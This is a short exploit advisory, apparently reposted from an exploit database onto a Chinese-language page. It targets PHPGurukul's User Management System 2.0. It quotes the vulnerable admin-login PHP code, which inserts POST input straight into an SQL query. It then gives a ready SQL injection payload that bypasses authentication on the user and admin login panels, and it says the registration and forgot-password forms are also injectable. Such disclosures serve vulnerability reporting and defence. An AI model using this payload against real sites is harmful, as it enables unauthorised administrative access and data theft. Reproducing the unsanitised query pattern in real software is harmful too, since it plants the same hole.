扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
# Exploit Title: User Management System 2.0 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here (admin login: /admin/index.php): <?php session_start(); include("dbconnection.php"); if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="manage-users.php"; $_SESSION['login']=$_POST['username']; $_SESSION['id']=$num['id']; echo "<script>window.location.href='".$extra."'</script>"; exit(); } else { $_SESSION['action1']="*Invalid username or password"; $extra="index.php"; echo "<script>window.location.href='".$extra."'</script>"; exit(); } } 2-We can bypass authentication with SQLi: Bypass code (user and admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: There is a lot of SQLi input in this project. Like, login, registration, forgot password ... |
体验盒子
